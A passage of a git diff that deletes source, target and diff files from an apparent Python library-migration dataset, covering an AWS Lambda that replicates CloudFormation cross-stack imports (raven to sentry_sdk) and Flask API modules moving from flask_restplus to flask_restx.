--    dynamodb_resource = boto3.resource('dynamodb')
--    cross_stack_ref_table = dynamodb_resource.Table(os.environ['CROSS_STACK_REF_TABLE_NAME'])
-+    dynamodb_resource = boto3.resource("dynamodb")
-+    cross_stack_ref_table = dynamodb_resource.Table(os.environ["CROSS_STACK_REF_TABLE_NAME"])
- 
-     scan_response = cross_stack_ref_table.scan()
--    cross_stack_references = scan_response['Items']
-+    cross_stack_references = scan_response["Items"]
- 
--    while scan_response.get('LastEvaluatedKey'):
--        scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey'])
--        cross_stack_references.extend(scan_response['Items'])
-+    while scan_response.get("LastEvaluatedKey"):
-+        scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response["LastEvaluatedKey"])
-+        cross_stack_references.extend(scan_response["Items"])
- 
-     if cross_stack_references:
--        number_of_chunk = len(cross_stack_references) / MAX_RESOURCES_PER_TEMPLATE
--        max_group_size = int(max(min(RESSOURCE_BY_GROUP/number_of_chunk, RESSOURCE_BY_GROUP), 1))
--
-         nested_template_urls = []
--        for items in _chunks(cross_stack_references, MAX_RESOURCES_PER_TEMPLATE):
--            nested_template_urls.append(_generate_nested_template(items, max_group_size))
-+        for items in _chunks(cross_stack_references, MAX_OUTPUTS_PER_TEMPLATE):
-+            nested_template_urls.append(_generate_nested_template(items))
- 
-         master_template_resources = {}
-         for i, url in enumerate(nested_template_urls):
--            master_template_resources[f"ParameterChunk{i}"] = {
--                "Type": "AWS::CloudFormation::Stack",
--                "Properties": {
--                    "TemplateURL": url
--                }
--            }
-+            master_template_resources[f"Chunk{i}"] = {"Type": "AWS::CloudFormation::Stack", "Properties": {"TemplateURL": url}}
-     else:
-         master_template_resources = {
--            'PlaceHolderParameter': {
--                'Type': 'AWS::SSM::Parameter',
--                'Properties': {
--                    'Value': {'Ref': "AWS::StackName"},
--                    'Type': 'String'
--                },
-+            "PlaceHolderResource": {
-+                "Type": "AWS::CloudFormation::WaitConditionHandle",
-+                "Properties": {},
-             }
-         }
- 
-     master_template = {
--        'AWSTemplateFormatVersion': '2010-09-09',
--        'Description': 'Auto-generated templates to simulate the standard importation behaviour on other regions',
--        'Resources': master_template_resources
-+        "AWSTemplateFormatVersion": "2010-09-09",
-+        "Description": "Auto-generated templates to simulate the standard importation behaviour on other regions",
-+        "Resources": master_template_resources,
-     }
- 
--    cloudformation_client = boto3.client('cloudformation')
-+    cloudformation_client = boto3.client("cloudformation")
- 
--    _upload_template(os.environ['GENERATED_STACK_NAME'], json.dumps(master_template))
--    template_url = _build_unsigned_url(os.environ['GENERATED_STACK_NAME'])
-+    _upload_template(os.environ["GENERATED_STACK_NAME"], json.dumps(master_template))
-+    template_url = _build_unsigned_url(os.environ["GENERATED_STACK_NAME"])
- 
-     try:
-         cloudformation_client.update_stack(
--            StackName=os.environ['GENERATED_STACK_NAME'],
-+            StackName=os.environ["GENERATED_STACK_NAME"],
-             TemplateURL=template_url,
-         )
-     except botocore.exceptions.ClientError as e:
--        message = e.response['Error']['Message']
--        if 'does not exist' in message:
-+        message = e.response["Error"]["Message"]
-+        if "does not exist" in message:
-             cloudformation_client.create_stack(
--                StackName=os.environ['GENERATED_STACK_NAME'],
-+                StackName=os.environ["GENERATED_STACK_NAME"],
-                 TemplateURL=template_url,
-             )
--        elif 'No updates are to be performed.' in message:
--            print('No updates are to be performed.')
-+        elif "No updates are to be performed." in message:
-+            print("No updates are to be performed.")
-         else:
-             raise
- 
-@@ -100,63 +81,46 @@ def _generate_hash(string_to_hash):
- 
- 
- def _upload_template(template_name, template_content):
--    s3_resource = boto3.resource('s3')
--    template_object = s3_resource.Object(os.environ['TEMPLATE_BUCKET'], template_name)
-+    s3_resource = boto3.resource("s3")
-+    template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name)
-     template_object.put(Body=template_content.encode())
- 
- 
- def _build_unsigned_url(template_name):
--    s3_resource = boto3.resource('s3')
--    template_object = s3_resource.Object(
--        os.environ['TEMPLATE_BUCKET'],
--        template_name
--    )
-+    s3_resource = boto3.resource("s3")
-+    template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name)
- 
--    return '{host}/{bucket}/{key}'.format(
-+    return "{host}/{bucket}/{key}".format(
-         host=template_object.meta.client.meta.endpoint_url,
-         bucket=template_object.bucket_name,
-         key=template_object.key,
-     )
- 
- 
--def _generate_nested_template(cross_stack_references, max_group_size):
--    last_ref_id = None
--    ssm_resources = {}
--    resource_count = 0
-+def _generate_nested_template(cross_stack_references):
-+    template = {
-+        "AWSTemplateFormatVersion": "2010-09-09",
-+        "Resources": {
-+            "PlaceHolderResource": {"Type": "AWS::CloudFormation::WaitConditionHandle", "Properties": {}},
-+        },
-+        "Outputs": {},
-+    }
- 
-     for ref in cross_stack_references:
--        ref_id = _generate_hash(ref['CrossStackRefId'])
--        ssm_resource = {
--            'Type': 'AWS::SSM::Parameter',
--            'Properties': {
--                'Name': {'Fn::Sub': "${AWS::StackName}." + ref_id},
--                'Description': f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}',
--                'Value': {'Fn::ImportValue': ref['ExportName']},
--                'Type': 'String'
--            },
-+        ref_id = _generate_hash(ref["CrossStackRefId"])
-+        output = {
-+            "Value": {"Fn::ImportValue": ref["ExportName"]},
-+            "Description": f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}',
-         }
- 
--        if last_ref_id:
--            ssm_resource['DependsOn'] = last_ref_id  # Required to prevent SSM throttling exceptions
--
--        ssm_resources[ref_id] = ssm_resource
--
--        if resource_count % max_group_size == 0:
--            last_ref_id = ref_id
--
--        resource_count += 1
--
--    imports_replication_template = {
--        'AWSTemplateFormatVersion': '2010-09-09',
--        'Resources': ssm_resources
--    }
-+        template["Outputs"][ref_id] = output
- 
-     template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}'
- 
--    _upload_template(template_name, json.dumps(imports_replication_template))
-+    _upload_template(template_name, json.dumps(template))
-     return _build_unsigned_url(template_name)
- 
- 
- def _chunks(l, n):
-     for i in range(0, len(l), n):
--        yield l[i:i + n]
-+        yield l[i : i + n]
diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py
deleted file mode 100644
index 89a70ee..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py
+++ /dev/null
@@ -1,162 +0,0 @@
-import hashlib
-import json
-import os
-from uuid import uuid4
-
-import boto3
-import botocore
-from raven import Client
-from raven.transport import HTTPTransport
-
-MAX_RESOURCES_PER_TEMPLATE = 200
-RESSOURCE_BY_GROUP = 5
-
-
-def lambda_handler(*_):
-    try:
-        _lambda_handler()
-    except:
-        # Using a the default transport does not work in a Lambda function.
-        # Must use the HTTPTransport.
-        Client(
-            dsn=os.environ['SENTRY_DSN'],
-            environment=os.environ['SENTRY_ENVIRONMENT'],
-            transport=HTTPTransport
-        ).captureException()
-        # Must raise, otherwise the Lambda will be marked as successful, and the exception
-        # will not be logged to CloudWatch logs.
-        raise
-
-
-def _lambda_handler():
-    dynamodb_resource = boto3.resource('dynamodb')
-    cross_stack_ref_table = dynamodb_resource.Table(os.environ['CROSS_STACK_REF_TABLE_NAME'])
-
-    scan_response = cross_stack_ref_table.scan()
-    cross_stack_references = scan_response['Items']
-
-    while scan_response.get('LastEvaluatedKey'):
-        scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey'])
-        cross_stack_references.extend(scan_response['Items'])
-
-    if cross_stack_references:
-        number_of_chunk = len(cross_stack_references) / MAX_RESOURCES_PER_TEMPLATE
-        max_group_size = int(max(min(RESSOURCE_BY_GROUP/number_of_chunk, RESSOURCE_BY_GROUP), 1))
-
-        nested_template_urls = []
-        for items in _chunks(cross_stack_references, MAX_RESOURCES_PER_TEMPLATE):
-            nested_template_urls.append(_generate_nested_template(items, max_group_size))
-
-        master_template_resources = {}
-        for i, url in enumerate(nested_template_urls):
-            master_template_resources[f"ParameterChunk{i}"] = {
-                "Type": "AWS::CloudFormation::Stack",
-                "Properties": {
-                    "TemplateURL": url
-                }
-            }
-    else:
-        master_template_resources = {
-            'PlaceHolderParameter': {
-                'Type': 'AWS::SSM::Parameter',
-                'Properties': {
-                    'Value': {'Ref': "AWS::StackName"},
-                    'Type': 'String'
-                },
-            }
-        }
-
-    master_template = {
-        'AWSTemplateFormatVersion': '2010-09-09',
-        'Description': 'Auto-generated templates to simulate the standard importation behaviour on other regions',
-        'Resources': master_template_resources
-    }
-
-    cloudformation_client = boto3.client('cloudformation')
-
-    _upload_template(os.environ['GENERATED_STACK_NAME'], json.dumps(master_template))
-    template_url = _build_unsigned_url(os.environ['GENERATED_STACK_NAME'])
-
-    try:
-        cloudformation_client.update_stack(
-            StackName=os.environ['GENERATED_STACK_NAME'],
-            TemplateURL=template_url,
-        )
-    except botocore.exceptions.ClientError as e:
-        message = e.response['Error']['Message']
-        if 'does not exist' in message:
-            cloudformation_client.create_stack(
-                StackName=os.environ['GENERATED_STACK_NAME'],
-                TemplateURL=template_url,
-            )
-        elif 'No updates are to be performed.' in message:
-            print('No updates are to be performed.')
-        else:
-            raise
-
-
-def _generate_hash(string_to_hash):
-    return hashlib.sha224(string_to_hash.encode()).hexdigest()
-
-
-def _upload_template(template_name, template_content):
-    s3_resource = boto3.resource('s3')
-    template_object = s3_resource.Object(os.environ['TEMPLATE_BUCKET'], template_name)
-    template_object.put(Body=template_content.encode())
-
-
-def _build_unsigned_url(template_name):
-    s3_resource = boto3.resource('s3')
-    template_object = s3_resource.Object(
-        os.environ['TEMPLATE_BUCKET'],
-        template_name
-    )
-
-    return '{host}/{bucket}/{key}'.format(
-        host=template_object.meta.client.meta.endpoint_url,
-        bucket=template_object.bucket_name,
-        key=template_object.key,
-    )
-
-
-def _generate_nested_template(cross_stack_references, max_group_size):
-    last_ref_id = None
-    ssm_resources = {}
-    resource_count = 0
-
-    for ref in cross_stack_references:
-        ref_id = _generate_hash(ref['CrossStackRefId'])
-        ssm_resource = {
-            'Type': 'AWS::SSM::Parameter',
-            'Properties': {
-                'Name': {'Fn::Sub': "${AWS::StackName}." + ref_id},
-                'Description': f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}',
-                'Value': {'Fn::ImportValue': ref['ExportName']},
-                'Type': 'String'
-            },
-        }
-
-        if last_ref_id:
-            ssm_resource['DependsOn'] = last_ref_id  # Required to prevent SSM throttling exceptions
-
-        ssm_resources[ref_id] = ssm_resource
-
-        if resource_count % max_group_size == 0:
-            last_ref_id = ref_id
-
-        resource_count += 1
-
-    imports_replication_template = {
-        'AWSTemplateFormatVersion': '2010-09-09',
-        'Resources': ssm_resources
-    }
-
-    template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}'
-
-    _upload_template(template_name, json.dumps(imports_replication_template))
-    return _build_unsigned_url(template_name)
-
-
-def _chunks(l, n):
-    for i in range(0, len(l), n):
-        yield l[i:i + n]
diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py
deleted file mode 100644
index 78d1aec..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py
+++ /dev/null
@@ -1,126 +0,0 @@
-import hashlib
-import json
-import os
-from uuid import uuid4
-
-import boto3
-import botocore
-import sentry_sdk
-from sentry_sdk.integrations.aws_lambda import AwsLambdaIntegration
-
-sentry_sdk.init(integrations=[AwsLambdaIntegration(timeout_warning=True)])
-
-MAX_OUTPUTS_PER_TEMPLATE = 200
-
-
-def lambda_handler(*_):
-    try:
-        _lambda_handler()
-    except:
-        raise
-
-
-def _lambda_handler():
-    dynamodb_resource = boto3.resource("dynamodb")
-    cross_stack_ref_table = dynamodb_resource.Table(os.environ["CROSS_STACK_REF_TABLE_NAME"])
-
-    scan_response = cross_stack_ref_table.scan()
-    cross_stack_references = scan_response["Items"]
-
-    while scan_response.get("LastEvaluatedKey"):
-        scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response["LastEvaluatedKey"])
-        cross_stack_references.extend(scan_response["Items"])
-
-    if cross_stack_references:
-        nested_template_urls = []
-        for items in _chunks(cross_stack_references, MAX_OUTPUTS_PER_TEMPLATE):
-            nested_template_urls.append(_generate_nested_template(items))
-
-        master_template_resources = {}
-        for i, url in enumerate(nested_template_urls):
-            master_template_resources[f"Chunk{i}"] = {"Type": "AWS::CloudFormation::Stack", "Properties": {"TemplateURL": url}}
-    else:
-        master_template_resources = {
-            "PlaceHolderResource": {
-                "Type": "AWS::CloudFormation::WaitConditionHandle",
-                "Properties": {},
-            }
-        }
-
-    master_template = {
-        "AWSTemplateFormatVersion": "2010-09-09",
-        "Description": "Auto-generated templates to simulate the standard importation behaviour on other regions",
-        "Resources": master_template_resources,
-    }
-
-    cloudformation_client = boto3.client("cloudformation")
-
-    _upload_template(os.environ["GENERATED_STACK_NAME"], json.dumps(master_template))
-    template_url = _build_unsigned_url(os.environ["GENERATED_STACK_NAME"])
-
-    try:
-        cloudformation_client.update_stack(
-            StackName=os.environ["GENERATED_STACK_NAME"],
-            TemplateURL=template_url,
-        )
-    except botocore.exceptions.ClientError as e:
-        message = e.response["Error"]["Message"]
-        if "does not exist" in message:
-            cloudformation_client.create_stack(
-                StackName=os.environ["GENERATED_STACK_NAME"],
-                TemplateURL=template_url,
-            )
-        elif "No updates are to be performed." in message:
-            print("No updates are to be performed.")
-        else:
-            raise
-
-
-def _generate_hash(string_to_hash):
-    return hashlib.sha224(string_to_hash.encode()).hexdigest()
-
-
-def _upload_template(template_name, template_content):
-    s3_resource = boto3.resource("s3")
-    template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name)
-    template_object.put(Body=template_content.encode())
-
-
-def _build_unsigned_url(template_name):
-    s3_resource = boto3.resource("s3")
-    template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name)
-
-    return "{host}/{bucket}/{key}".format(
-        host=template_object.meta.client.meta.endpoint_url,
-        bucket=template_object.bucket_name,
-        key=template_object.key,
-    )
-
-
-def _generate_nested_template(cross_stack_references):
-    template = {
-        "AWSTemplateFormatVersion": "2010-09-09",
-        "Resources": {
-            "PlaceHolderResource": {"Type": "AWS::CloudFormation::WaitConditionHandle", "Properties": {}},
-        },
-        "Outputs": {},
-    }
-
-    for ref in cross_stack_references:
-        ref_id = _generate_hash(ref["CrossStackRefId"])
-        output = {
-            "Value": {"Fn::ImportValue": ref["ExportName"]},
-            "Description": f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}',
-        }
-
-        template["Outputs"][ref_id] = output
-
-    template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}'
-
-    _upload_template(template_name, json.dumps(template))
-    return _build_unsigned_url(template_name)
-
-
-def _chunks(l, n):
-    for i in range(0, len(l), n):
-        yield l[i : i + n]
diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff
deleted file mode 100644
index bbeacb5..0000000
--- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/src/api/IocManager.py b/src/api/IocManager.py
- index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644
- --- a/src/api/IocManager.py
- +++ b/src/api/IocManager.py
-@@ -3,7 +3,7 @@ import os
- import sys
- from flask import Flask
- from flask_injector import request, FlaskInjector
--from flask_restplus import Api
-+from flask_restx import Api
- from injector import singleton, Injector, threadlocal, Binder
- from sqlalchemy import MetaData
- from sqlalchemy.ext.declarative import declarative_base
diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py
deleted file mode 100644
index f764763..0000000
--- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py
+++ /dev/null
@@ -1,143 +0,0 @@
-from multiprocessing.process import current_process
-import os
-import sys
-from flask import Flask
-from flask_injector import request, FlaskInjector
-from flask_restplus import Api
-from injector import singleton, Injector, threadlocal, Binder
-from sqlalchemy import MetaData
-from sqlalchemy.ext.declarative import declarative_base
-from infrastructor.api.ResourceBase import ResourceBase
-from infrastructor.dependency.scopes import ISingleton, IScoped
-from infrastructor.logging.ConsoleLogger import ConsoleLogger
-from infrastructor.utils.ConfigManager import ConfigManager
-from infrastructor.utils.Utils import Utils
-from models.configs.ApiConfig import ApiConfig
-from models.configs.ApplicationConfig import ApplicationConfig
-from models.configs.DatabaseConfig import DatabaseConfig
-from models.configs.SchedulerRpcClientConfig import SchedulerRpcClientConfig
-
-
-class IocManager:
-    app: Flask = None
-    api: Api = None
-    binder: Binder = None
-    app_wrapper = None
-    config_manager = None
-    injector: Injector = None
-    Base = declarative_base(metadata=MetaData(schema='Common'))
-
-    @staticmethod
-    def initialize():
-        root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__))))
-        IocManager.configure_startup(root_directory)
-
-    @staticmethod
-    def set_app_wrapper(app_wrapper=None):
-        IocManager.app_wrapper = app_wrapper
-
-    @staticmethod
-    def initialize_flask():
-
-        application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig)
-        IocManager.app = Flask(application_config.name)
-        authorizations = {
-            'apikey': {
-                'type': 'apiKey',
-                'in': 'header',
-                'name': 'X-API'
-            },
-            'oauth2': {
-                'type': 'oauth2',
-                'flow': 'accessCode',
-                'tokenUrl': 'https://somewhere.com/token',
-                'authorizationUrl': 'https://somewhere.com/auth',
-                'scopes': {
-                    'read': 'Grant read-only access',
-                    'write': 'Grant read-write access',
-                }
-            }
-        }
-        IocManager.api = Api(IocManager.app, security=['apikey', {'oauth2': 'read'}], authorizations=authorizations)
-        # Flask instantiate
-        # IocManager.api = Api(app=IocManager.app,authorizations=authorizations, security='apikey')
-
-    # wrapper required for dependency
-    @staticmethod
-    def configure_startup(root_directory):
-        # Configuration initialize
-        IocManager.config_manager = ConfigManager(root_directory)
-        IocManager.process_info()
-
-        IocManager.initialize_flask()
-
-        # Importing all modules for dependency
-        sys.path.append(root_directory)
-        folders = Utils.find_sub_folders(root_directory)
-        module_list, module_attr_list = Utils.get_modules(folders)
-
-        IocManager.injector = Injector()
-        # Flask injector configuration
-        IocManager.set_database_application_name()
-        FlaskInjector(app=IocManager.app, modules=[IocManager.configure], injector=IocManager.injector)
-
-    @staticmethod
-    def set_database_application_name():
-        application_config = IocManager.config_manager.get(ApplicationConfig)
-        database_config: DatabaseConfig = IocManager.config_manager.get(DatabaseConfig)
-        if database_config.application_name is None:
-            process_info = IocManager.get_process_info()
-            IocManager.config_manager.set(DatabaseConfig, "application_name",
-                                          f"{application_config.name}-({process_info})")
-
-    @staticmethod
-    def run():
-        IocManager.injector.get(IocManager.app_wrapper).run()
-
-    @staticmethod
-    def configure(binder: Binder):
-        IocManager.binder = binder
-
-        for config in IocManager.config_manager.get_all():
-            binder.bind(
-                config.get("type"),
-                to=config.get("instance"),
-                scope=singleton,
-            )
-
-        for singletonScope in ISingleton.__subclasses__():
-            binder.bind(
-                singletonScope,
-                to=singletonScope,
-                scope=singleton,
-            )
-
-        for scoped in IScoped.__subclasses__():
-            binder.bind(
-                scoped,
-                to=scoped,
-                scope=threadlocal,
-            )
-
-        for controller in ResourceBase.__subclasses__():
-            binder.bind(
-                controller,
-                to=controller,
-                scope=request,
-            )
-        if IocManager.app_wrapper is not None:
-            api_config = IocManager.config_manager.get(ApiConfig)
-            binder.bind(
-                IocManager.app_wrapper,
-                to=IocManager.app_wrapper(api_config)
-            )
-
-    @staticmethod
-    def get_process_info():
-        return f"{current_process().name} ({os.getpid()},{os.getppid()})"
-
-    @staticmethod
- def process_info(): - logger = ConsoleLogger() - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - logger.info(f"Application : {application_config.name}") diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py deleted file mode 100644 index e1cb23a..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py +++ /dev/null @@ -1,143 +0,0 @@ -from multiprocessing.process import current_process -import os -import sys -from flask import Flask -from flask_injector import request, FlaskInjector -from flask_restx import Api -from injector import singleton, Injector, threadlocal, Binder -from sqlalchemy import MetaData -from sqlalchemy.ext.declarative import declarative_base -from infrastructor.api.ResourceBase import ResourceBase -from infrastructor.dependency.scopes import ISingleton, IScoped -from infrastructor.logging.ConsoleLogger import ConsoleLogger -from infrastructor.utils.ConfigManager import ConfigManager -from infrastructor.utils.Utils import Utils -from models.configs.ApiConfig import ApiConfig -from models.configs.ApplicationConfig import ApplicationConfig -from models.configs.DatabaseConfig import DatabaseConfig -from models.configs.SchedulerRpcClientConfig import SchedulerRpcClientConfig - - -class IocManager: - app: Flask = None - api: Api = None - binder: Binder = None - app_wrapper = None - config_manager = None - injector: Injector = None - Base = declarative_base(metadata=MetaData(schema='Common')) - - @staticmethod - def initialize(): - root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)))) - IocManager.configure_startup(root_directory) - - @staticmethod - def set_app_wrapper(app_wrapper=None): - IocManager.app_wrapper = app_wrapper - - @staticmethod - def initialize_flask(): - - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - IocManager.app = Flask(application_config.name) - authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API' - }, - 'oauth2': { - 'type': 'oauth2', - 'flow': 'accessCode', - 'tokenUrl': 'https://somewhere.com/token', - 'authorizationUrl': 'https://somewhere.com/auth', - 'scopes': { - 'read': 'Grant read-only access', - 'write': 'Grant read-write access', - } - } - } - IocManager.api = Api(IocManager.app, security=['apikey', {'oauth2': 'read'}], authorizations=authorizations) - # Flask instantiate - # IocManager.api = Api(app=IocManager.app,authorizations=authorizations, security='apikey') - - # wrapper required for dependency - @staticmethod - def configure_startup(root_directory): - # Configuration initialize - IocManager.config_manager = ConfigManager(root_directory) - IocManager.process_info() - - IocManager.initialize_flask() - - # Importing all modules for dependency - sys.path.append(root_directory) - folders = Utils.find_sub_folders(root_directory) - module_list, module_attr_list = Utils.get_modules(folders) - - IocManager.injector = Injector() - # Flask injector configuration - IocManager.set_database_application_name() - FlaskInjector(app=IocManager.app, modules=[IocManager.configure], injector=IocManager.injector) - - @staticmethod - def set_database_application_name(): - application_config = IocManager.config_manager.get(ApplicationConfig) - database_config: DatabaseConfig = 
IocManager.config_manager.get(DatabaseConfig) - if database_config.application_name is None: - process_info = IocManager.get_process_info() - IocManager.config_manager.set(DatabaseConfig, "application_name", - f"{application_config.name}-({process_info})") - - @staticmethod - def run(): - IocManager.injector.get(IocManager.app_wrapper).run() - - @staticmethod - def configure(binder: Binder): - IocManager.binder = binder - - for config in IocManager.config_manager.get_all(): - binder.bind( - config.get("type"), - to=config.get("instance"), - scope=singleton, - ) - - for singletonScope in ISingleton.__subclasses__(): - binder.bind( - singletonScope, - to=singletonScope, - scope=singleton, - ) - - for scoped in IScoped.__subclasses__(): - binder.bind( - scoped, - to=scoped, - scope=threadlocal, - ) - - for controller in ResourceBase.__subclasses__(): - binder.bind( - controller, - to=controller, - scope=request, - ) - if IocManager.app_wrapper is not None: - api_config = IocManager.config_manager.get(ApiConfig) - binder.bind( - IocManager.app_wrapper, - to=IocManager.app_wrapper(api_config) - ) - - @staticmethod - def get_process_info(): - return f"{current_process().name} ({os.getpid()},{os.getppid()})" - - @staticmethod - def process_info(): - logger = ConsoleLogger() - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - logger.info(f"Application : {application_config.name}") diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff deleted file mode 100644 index 69d4238..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/src/api/controllers/common/models/CommonModels.py b/src/api/controllers/common/models/CommonModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/common/models/CommonModels.py - +++ b/src/api/controllers/common/models/CommonModels.py -@@ -1,18 +1,44 @@ -+import json -+import traceback - from datetime import datetime - --from flask_restplus import fields -+from flask_restx import fields - - from IocManager import IocManager -+from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager - from infrastructor.exceptions.OperationalException import OperationalException -+from infrastructor.logging.SqlLogger import SqlLogger - - - @IocManager.api.errorhandler(OperationalException) --def handle_error(error): -- return CommonModels.get_error_response(message=error) -+def handle_operational_exception(exception): -+ separator = '|' -+ default_content_type = "application/json" -+ mime_type_string = "mimetype" -+ """Return JSON instead of HTML for HTTP errors.""" -+ IocManager.injector.get(DatabaseSessionManager).rollback() -+ # start with the correct headers and status code from the error -+ exception_traceback = traceback.format_exc() -+ output = separator.join(exception.args) -+ # replace the body with JSON -+ # response = json.dumps() -+ output_message = "empty" -+ if output is not None and output != "": -+ output_message = output -+ trace_message = "empty" -+ if exception_traceback is not None and exception_traceback != "": -+ trace_message = exception_traceback -+ 
IocManager.injector.get(SqlLogger).error(f'Operational Exception Messsage:{output_message} - Trace:{trace_message}') -+ return { -+ "result": "", -+ "isSuccess": "false", -+ "message": output -+ }, 400, {mime_type_string: default_content_type} - --@IocManager.api.errorhandler(Exception) --def handle_error(error): -- return CommonModels.get_error_response(message=error) -+ -+# @IocManager.api.errorhandler(Exception) -+# def handle_error(error): -+# return CommonModels.get_error_response(message=error) - - class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py deleted file mode 100644 index bb68ea4..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -from datetime import datetime - -from flask_restplus import fields - -from IocManager import IocManager -from infrastructor.exceptions.OperationalException import OperationalException - - -@IocManager.api.errorhandler(OperationalException) -def handle_error(error): - return CommonModels.get_error_response(message=error) - -@IocManager.api.errorhandler(Exception) -def handle_error(error): - return CommonModels.get_error_response(message=error) - -class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { - 'IsSuccess': fields.Boolean(description='Service finished operation with successfully', default=True), - 'Message': fields.String(description='Service result values', default="Operation Completed"), - 'Result': fields.Raw(description='Service result values'), - }) - - def date_converter(o): - if isinstance(o, datetime): - return o.__str__() - @staticmethod - def get_response(result=None, message=None): - return {'Result': result, 'Message': message} - - @staticmethod - def get_error_response(message): - return {"IsSuccess": False, 'Message': message} - - -class EntityModel: - def __init__(self, - Id: int = None, - ): - self.Id: int = Id diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py deleted file mode 100644 index 9c81e67..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py +++ /dev/null @@ -1,66 +0,0 @@ -import json -import traceback -from datetime import datetime - -from flask_restx import fields - -from IocManager import IocManager -from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager -from infrastructor.exceptions.OperationalException import OperationalException -from infrastructor.logging.SqlLogger import SqlLogger - - -@IocManager.api.errorhandler(OperationalException) -def handle_operational_exception(exception): - separator = '|' - default_content_type = "application/json" - mime_type_string = "mimetype" - """Return JSON instead of HTML for HTTP errors.""" - IocManager.injector.get(DatabaseSessionManager).rollback() - # start with the correct headers and status code from the error - exception_traceback = traceback.format_exc() - output = separator.join(exception.args) - # 
replace the body with JSON - # response = json.dumps() - output_message = "empty" - if output is not None and output != "": - output_message = output - trace_message = "empty" - if exception_traceback is not None and exception_traceback != "": - trace_message = exception_traceback - IocManager.injector.get(SqlLogger).error(f'Operational Exception Messsage:{output_message} - Trace:{trace_message}') - return { - "result": "", - "isSuccess": "false", - "message": output - }, 400, {mime_type_string: default_content_type} - - -# @IocManager.api.errorhandler(Exception) -# def handle_error(error): -# return CommonModels.get_error_response(message=error) - -class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { - 'IsSuccess': fields.Boolean(description='Service finished operation with successfully', default=True), - 'Message': fields.String(description='Service result values', default="Operation Completed"), - 'Result': fields.Raw(description='Service result values'), - }) - - def date_converter(o): - if isinstance(o, datetime): - return o.__str__() - @staticmethod - def get_response(result=None, message=None): - 